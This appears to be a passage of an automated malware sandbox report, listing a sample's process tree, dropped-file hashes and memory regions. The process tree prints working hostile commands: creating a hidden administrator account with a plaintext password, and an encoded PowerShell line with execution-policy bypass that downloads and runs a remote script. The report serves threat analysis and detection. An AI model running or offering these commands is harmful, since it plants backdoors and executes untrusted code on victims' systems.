C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lbwp0NfX1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lbwp0NfX2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RESAA84.tmpMD5
1f5107cde41f9b56ee0669b9d308fe3c
SHA1badd44b4711229daae29976286595ea50c7b3259
SHA25698e6e89bc7ee50963208bfc4d6c8abc2d78668e162cea9fceb241a00e535e959
SHA5120079e538a33fb20250bb5dfbad22183d3a5234cfe7fb20e8189a3e491156f5e8bcd5a0fbb3fe556abdbe9842b0e849110a9fb14b27189df1add3d4a0a2d9d91b
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.dllMD5
61e776ecbbc56e90c4d315ca14b31b5e
SHA190bcda6d41405ff191077e91ea72ea783feb3f7e
SHA25621ecae57c458b694b2750f97c33519bff1b9da253c0f2af277b4e5d8b9a4b685
SHA5123620363d6aaf82dd973e56e0ecbf954938c78b64fc455d3f3d650cbf3f86c5bb423940bfe82ac4e6830465628c4103bd17977d4d6128d4168d2d80508918cd5d
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMPMD5
234f28790f7480f6b62d3b41f8578a47
SHA153d4d94f5e36f5e519fb939ea29312c79a15272f
SHA256fbe2d03b4e696077c38caf92564de0748cc1e844fc230858bc0a413e08d3b281
SHA512711756cc090413e971d09fa4abd2a317da518dfd348dbcc1db23b8f6ce3bb79e756990ad31356dbb104472c80777a1414e6594cb0d12de0e9db6eba252aefc56
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdlineMD5
50ff482f56afe0cfd3c2b235aabbccc9
SHA1fbc72f199cbf7bade6be03c099df51ce6b2f9067
SHA256531ed601b6467c5ca2ed41f220f8fbd7a7442a4075f6c9824711f9e76cb244b8
SHA51282a46ed9c0d3280e64e95d61beb26fd2b63624c14d5ed7812daeb0e3daa91924baab7e89aa43b32e0256ccc6b7b31837051a796b7e2a6653417456eec0a96148
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/692-436-0x000001ED63888000-0x000001ED63889000-memory.dmpFilesize
4KB
-
memory/692-410-0x000001ED63886000-0x000001ED63888000-memory.dmpFilesize
8KB
-
memory/692-403-0x000001ED63880000-0x000001ED63882000-memory.dmpFilesize
8KB
-
memory/692-392-0x0000000000000000-mapping.dmp
-
memory/692-404-0x000001ED63883000-0x000001ED63885000-memory.dmpFilesize
8KB
-
memory/844-282-0x00000239C4563000-0x00000239C4565000-memory.dmpFilesize
8KB
-
memory/844-314-0x00000239C4568000-0x00000239C456A000-memory.dmpFilesize
8KB
-
memory/844-281-0x00000239C4560000-0x00000239C4562000-memory.dmpFilesize
8KB
-
memory/844-313-0x00000239C4566000-0x00000239C4568000-memory.dmpFilesize
8KB
-
memory/844-264-0x0000000000000000-mapping.dmp
-
memory/1012-389-0x0000000000000000-mapping.dmp
-
memory/1128-373-0x0000000000000000-mapping.dmp
-
memory/1148-383-0x0000000000000000-mapping.dmp
-
memory/1240-131-0x0000000000000000-mapping.dmp
-
memory/1240-159-0x0000021EF2880000-0x0000021EF2881000-memory.dmpFilesize
4KB
-
memory/1240-145-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-149-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-150-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-151-0x0000021EF28E6000-0x0000021EF28E8000-memory.dmpFilesize
8KB
-
memory/1240-142-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-141-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-140-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-132-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-139-0x0000021EF28E3000-0x0000021EF28E5000-memory.dmpFilesize
8KB
-
memory/1240-137-0x0000021EF2820000-0x0000021EF2821000-memory.dmpFilesize
4KB
-
memory/1240-138-0x0000021EF28E0000-0x0000021EF28E2000-memory.dmpFilesize
8KB
-
memory/1240-143-0x0000021EF49C0000-0x0000021EF49C1000-memory.dmpFilesize
4KB
-
memory/1240-136-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-161-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-165-0x0000021EF5440000-0x0000021EF5441000-memory.dmpFilesize
4KB
-
memory/1240-166-0x0000021EF57D0000-0x0000021EF57D1000-memory.dmpFilesize
4KB
-
memory/1240-167-0x0000021EF28E8000-0x0000021EF28E9000-memory.dmpFilesize
4KB
-
memory/1240-174-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-175-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-135-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-134-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-133-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1276-374-0x0000000000000000-mapping.dmp
-
memory/1524-462-0x0000000000000000-mapping.dmp
-
memory/1688-184-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-177-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-183-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-185-0x000002307CBE0000-0x000002307CBE2000-memory.dmpFilesize
8KB
-
memory/1688-186-0x000002307CBE3000-0x000002307CBE5000-memory.dmpFilesize
8KB
-
memory/1688-187-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-188-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-190-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-208-0x000002307CBE6000-0x000002307CBE8000-memory.dmpFilesize
8KB
-
memory/1688-176-0x0000000000000000-mapping.dmp
-
memory/1688-178-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-243-0x000002307CBE8000-0x000002307CBEA000-memory.dmpFilesize
8KB
-
memory/1688-179-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-180-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-181-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1800-381-0x0000000000000000-mapping.dmp
-
memory/2000-377-0x0000000000000000-mapping.dmp
-
memory/2012-384-0x0000000000000000-mapping.dmp
-
memory/2368-152-0x0000000000000000-mapping.dmp
-
memory/2420-325-0x0000000000000000-mapping.dmp
-
memory/2500-155-0x0000000000000000-mapping.dmp
-
memory/2768-378-0x0000000000000000-mapping.dmp
-
memory/2780-380-0x0000000000000000-mapping.dmp
-
memory/2824-463-0x0000000000000000-mapping.dmp
-
memory/3012-324-0x0000000000000000-mapping.dmp
-
memory/3056-121-0x0000000000720000-0x0000000000736000-memory.dmpFilesize
88KB
-
memory/3212-326-0x0000000000000000-mapping.dmp
-
memory/3220-118-0x0000000003130000-0x0000000003138000-memory.dmpFilesize
32KB
-
memory/3220-120-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3220-119-0x0000000003140000-0x0000000003149000-memory.dmpFilesize
36KB
-
memory/3232-364-0x0000000000000000-mapping.dmp
-
memory/3440-391-0x0000000000000000-mapping.dmp
-
memory/3944-368-0x0000000000000000-mapping.dmp
-
memory/4116-390-0x0000000000000000-mapping.dmp
-
memory/4256-382-0x0000000000000000-mapping.dmp
-
memory/4512-379-0x0000000000000000-mapping.dmp
-
memory/4524-363-0x0000000000000000-mapping.dmp
-
memory/4564-372-0x0000000000000000-mapping.dmp
-
memory/4568-371-0x0000000000000000-mapping.dmp
-
memory/4580-125-0x000002034F2B0000-0x000002034F6AF000-memory.dmpFilesize
4.0MB
-
memory/4580-122-0x0000000000000000-mapping.dmp
-
memory/4580-129-0x000002034EE95000-0x000002034EE96000-memory.dmpFilesize
4KB
-
memory/4580-130-0x000002034EE96000-0x000002034EE97000-memory.dmpFilesize
4KB
-
memory/4580-127-0x000002034EE90000-0x000002034EE92000-memory.dmpFilesize
8KB
-
memory/4580-128-0x000002034EE93000-0x000002034EE95000-memory.dmpFilesize
8KB
-
memory/4624-367-0x0000000000000000-mapping.dmp
-
memory/4656-370-0x0000000000000000-mapping.dmp
-
memory/4676-369-0x0000000000000000-mapping.dmp
-
memory/4932-386-0x0000000000000000-mapping.dmp
-
memory/5020-387-0x0000000000000000-mapping.dmp
-
memory/5032-388-0x0000000000000000-mapping.dmp
-
memory/5052-385-0x0000000000000000-mapping.dmp
-
memory/5064-222-0x0000000000000000-mapping.dmp
-
memory/5064-280-0x000001BAC55B8000-0x000001BAC55BA000-memory.dmpFilesize
8KB
-
memory/5064-249-0x000001BAC55B6000-0x000001BAC55B8000-memory.dmpFilesize
8KB
-
memory/5064-247-0x000001BAC55B3000-0x000001BAC55B5000-memory.dmpFilesize
8KB
-
memory/5064-245-0x000001BAC55B0000-0x000001BAC55B2000-memory.dmpFilesize
8KB